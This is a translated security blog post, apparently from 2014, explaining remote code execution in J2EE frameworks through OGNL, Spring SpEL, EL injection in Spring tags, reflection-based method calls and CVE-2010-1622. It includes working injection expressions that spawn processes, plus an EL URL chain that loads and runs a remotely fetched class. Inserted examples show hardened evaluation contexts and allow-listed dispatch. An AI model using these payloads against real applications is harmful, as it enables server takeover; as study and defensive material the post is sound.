Nebula, 2014/02/11

0x00 Background


In J2EE remote code execution, the essence of most cases is the ability to control Java objects directly from the outside (other languages are not discussed here, but the same applies). Controlling Java objects generally covers several situations: creating objects directly with new; calling an object's methods (including static methods); accessing an object's properties (assigning values); and so on.

Some J2EE frameworks are designed so that certain functionality allows exactly this, which is what makes remote code execution possible.

0x01 OGNL


Reference: drops.wooyun.org/papers/340

getValue: call a static method of a class to execute a command:

```java
OgnlContext context = new OgnlContext();
// @class@method(...) is OGNL's static-method call syntax; the whole expression string is attacker-controlled text
Ognl.getValue("@java.lang.Runtime@getRuntime().exec('calc')", context, context.getRoot());
```

setValue: new an object and call a method on it to execute a command:

```java
OgnlContext context = new OgnlContext();
// setValue(expression, context, root, value): the expression is parsed and evaluated on the way to the assignment,
// so attacker-controlled expression text is just as dangerous here as in getValue
Ognl.setValue("new java.lang.ProcessBuilder(new java.lang.String[]{'calc'}).start()",
        context, context.getRoot(), null);
```

If OGNL is used to implement some function or mechanism of a J2EE framework, and the getValue or setValue call is allowed to take the complete content of an external parameter as its expression, that is definitely dangerous!!

Examples include the WebWork and Struts2 frameworks. (I hate to say it, but Struts2 is dragging down Java security.) The formation of every OGNL remote code execution vulnerability can be summarized in one sentence: when OGNL is used to implement some function or mechanism of the framework, external parameters are allowed to be passed directly into OGNL expressions, or the security restrictions can be bypassed.

0x02 SpEL expressions in the Spring framework, similar to OGNL


1. Call a static method of a class to execute a command:

```java
org.springframework.expression.ExpressionParser parser =
        new org.springframework.expression.spel.standard.SpelExpressionParser();
// T(type) is SpEL's type-reference syntax, which gives access to static methods
org.springframework.expression.Expression exp =
        parser.parseExpression("T(java.lang.Runtime).getRuntime().exec('calc')");
exp.getValue(); // evaluating the expression is what runs the command
```

2. New an object and call a method on it to execute a command:

```java
org.springframework.expression.ExpressionParser parser =
        new org.springframework.expression.spel.standard.SpelExpressionParser();
// constructor calls are allowed by the default (standard) evaluation context
org.springframework.expression.Expression exp =
        parser.parseExpression("new java.lang.ProcessBuilder((new java.lang.String[]{'calc'})).start()");
exp.getValue();
```

But Spring is probably not as irresponsible about security as Struts2 (it is a little better now, though!). It has had similar security vulnerabilities; those interested can go and look them up ^-^
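The OGNL and SpEL sections above make the same point: the danger lies in the evaluation context that an attacker-controlled expression is handed to, so the remedy is to evaluate untrusted text only against a context that cannot resolve type references, constructors or static methods. The following is an added example, not code from the original post or from the Spring project. It runs the two expression shapes from this section (a type reference and a constructor call), with harmless payloads, against Spring's StandardEvaluationContext and against SimpleEvaluationContext. The Order class, the expression strings and the method names are constructed for the demo; it assumes a Spring Framework version that ships SimpleEvaluationContext (the 4.3.x/5.0.x line and later) on the classpath.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.EvaluationException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

/**
 * Added example (not from the original post): the same untrusted expression strings
 * evaluated against a StandardEvaluationContext (the vulnerable pattern) and against
 * a SimpleEvaluationContext (the restricted one). Order and the sample expressions
 * are constructed for this demo.
 */
public class SpelUntrustedInputDemo {

    // Hypothetical data object that a template is legitimately allowed to read.
    public static class Order {
        public String getCustomer() { return "alice"; }
        public int getQuantity() { return 3; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    /** Vulnerable: full-power context, so T(...), new and static methods all resolve. */
    public static Object evaluateUnrestricted(String untrustedExpr, Object root) {
        EvaluationContext ctx = new StandardEvaluationContext(root);
        return PARSER.parseExpression(untrustedExpr).getValue(ctx);
    }

    /** Hardened: read-only data binding; type references, constructors and bean references are rejected. */
    public static Object evaluateRestricted(String untrustedExpr, Object root) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        return PARSER.parseExpression(untrustedExpr).getValue(ctx, root);
    }

    public static void main(String[] args) {
        Order order = new Order();
        // Legitimate use: read properties of the root object. Works in both contexts.
        String benign = "customer + ' x ' + quantity";
        // The two shapes from the post (type reference, constructor call) with harmless payloads.
        String[] hostile = {
            "T(java.lang.System).getProperty('java.version')",
            "new java.lang.StringBuilder('created').toString()"
        };

        System.out.println("benign/restricted   : " + evaluateRestricted(benign, order));
        for (String expr : hostile) {
            System.out.println("hostile/unrestricted: " + evaluateUnrestricted(expr, order));
            try {
                evaluateRestricted(expr, order);
                System.out.println("hostile/restricted  : UNEXPECTEDLY ALLOWED");
            } catch (EvaluationException e) {
                // SimpleEvaluationContext has no type locator and no constructor resolvers,
                // so both expressions fail here before anything is executed.
                System.out.println("hostile/restricted  : rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

The restricted context still lets a template read `customer` and `quantity`, which is all a data-binding use case needs; everything the post's payloads rely on (type references, constructors, static calls) is simply unresolvable there. The same idea applies to OGNL: give the OgnlContext a MemberAccess implementation that denies static members and sensitive classes instead of accepting whatever the expression names, which is what Struts2's later SecurityMemberAccess does.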

0x03 EL expression injection in the Spring tag implementation


For example, a code scenario like this:

```jsp
<spring:message text="${param.el}"></spring:message>
```

The impact originally reported for this vulnerability was information leakage (paths, JARs, and so on):

Remote command execution: whether code can actually be executed depends heavily on the web container. Glassfish or Resin, on the versions where the reflection trick works, are the better choices for executing code.

```text
http://127.0.0.1:8080/spring/login.jsp?el=${pageContext.request.getSession().setAttribute("exp","".getClass().forName("java.util.ArrayList").newInstance())}

http://127.0.0.1:8080/spring/login.jsp?el=${pageContext.request.getSession().getAttribute("exp").add(pageContext.getServletContext().getResource("/").toURI().create("http://127.0.0.1:8080/spring/").toURL())}

http://127.0.0.1:8080/spring/login.jsp?el=${pageContext.getClass().getClassLoader().getParent().newInstance(pageContext.request.getSession().getAttribute("exp").toArray(pageContext.getClass().getClassLoader().getParent().getURLs())).loadClass("exp").newInstance()}
```

This remotely loads an exp.class and executes the command in its constructor (the code runs when the object is initialized). Since other web servers restrict these object method calls, executing malicious code there is bound to run into problems.

What matters about this vulnerability is learning the exploitation technique; the actual harm is not large!

0x04 Reflection mechanism implementing dynamic method calls


Reference: zone.wooyun.org/content/697…

In fact, this article mainly presents the vulnerability class caused by improper use of the reflection mechanism for method access, rather than the Struts2 vulnerability itself; maybe everyone is nostalgic for the series of easy Struts2 getshell exploits!

Simplified pseudocode:

```java
Class clazz = object.getClass();
Method m = clazz.getDeclaredMethod(methodName); // methodName comes from an external parameter
m.invoke(object);
```

The principle is simple: if the argument to getDeclaredMethod comes from an external parameter, the caller can invoke that method directly, which is code execution; but how much harm results depends on the actual power of the method being called!
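Here is an added example (not code from the post or from the referenced article) showing the simplified pattern above with the method name taken from a request parameter, beside a hardened dispatcher that accepts the name only from an explicit allow-list and additionally rejects static methods and anything declared on Object or Class. The Greeter class, the ALLOWED table and the sample parameter values are constructed for the demo; it needs Java 9 or later for Map.of/Set.of.

```java
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Map;
import java.util.Set;

/**
 * Added example (not from the post): the "dynamic method call" pattern with the method
 * name coming from outside, next to a hardened dispatcher. Greeter, ALLOWED and the
 * sample request values are constructed for this demo.
 */
public class ReflectiveDispatch {

    public static class Greeter {
        public String hello() { return "hello"; }
        public String bye() { return "bye"; }
        // Something that must never be reachable from a request parameter.
        public String reset() { return "state wiped"; }
    }

    /** Vulnerable shape from the post: any no-arg declared method, including reset(), can be named. */
    public static Object dispatchUnchecked(Object target, String methodName) throws Exception {
        Class<?> clazz = target.getClass();
        Method m = clazz.getDeclaredMethod(methodName);
        return m.invoke(target);
    }

    // Explicit allow-list keyed by the receiver class: the request may choose only among these names.
    private static final Map<Class<?>, Set<String>> ALLOWED = Map.of(
            Greeter.class, Set.of("hello", "bye"));

    /** Hardened: allow-list, public only, non-static, and nothing inherited from Object or Class. */
    public static Object dispatchChecked(Object target, String methodName) throws Exception {
        Class<?> clazz = target.getClass();
        Set<String> names = ALLOWED.get(clazz);
        if (names == null || !names.contains(methodName)) {
            throw new IllegalArgumentException("method not permitted: " + methodName);
        }
        Method m = clazz.getMethod(methodName); // public methods only
        if (Modifier.isStatic(m.getModifiers())
                || m.getDeclaringClass() == Object.class
                || m.getDeclaringClass() == Class.class) {
            throw new IllegalArgumentException("method not permitted: " + methodName);
        }
        try {
            return m.invoke(target);
        } catch (InvocationTargetException e) {
            // Surface the action's own failure, not the reflection wrapper.
            throw new IllegalStateException("action failed", e.getCause());
        }
    }

    public static void main(String[] args) throws Exception {
        Greeter g = new Greeter();
        String[] requested = {"hello", "reset", "getClass"}; // constructed request parameter values
        for (String name : requested) {
            Object unchecked;
            try {
                unchecked = dispatchUnchecked(g, name);
            } catch (NoSuchMethodException e) {
                unchecked = "NoSuchMethodException";
            }
            Object checked;
            try {
                checked = dispatchChecked(g, name);
            } catch (IllegalArgumentException e) {
                checked = "rejected";
            }
            System.out.printf("%-9s unchecked=%-22s checked=%s%n", name, unchecked, checked);
        }
    }
}
```

The unchecked dispatcher happily runs `reset` because the request chose it; the checked one refuses it and also refuses `getClass`, which the post's EL chain relies on as a stepping stone. An allow-list of names per receiver class is the check that matters; the static/Object/Class filter is a second line in case the list is ever widened carelessly.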

0x05 Spring class.classLoader.urls[0] object property assignment


CVE-2010-1622 is one of my favorite exploits:

This exploit is a bit roundabout, but if you understand Java it is actually very simple! (It is often said that a coder who likes to stay up late is not a good worker; go to sleep!)

I have read many analyses of this vulnerability in the past, and I recommend this one:

www.iteye.com/topic/11233…

In addition, in my personal opinion, the actual harm from other exploitations of this vulnerability is greater than command execution, for example denial of service.

Taking the imagination one level higher: as long as you can control a Java object in any scenario, it can theoretically execute code (whether that can be exploited effectively is another matter). To put it more bluntly, the programmers who wrote the underlying code did not know that these problems could lead to security holes!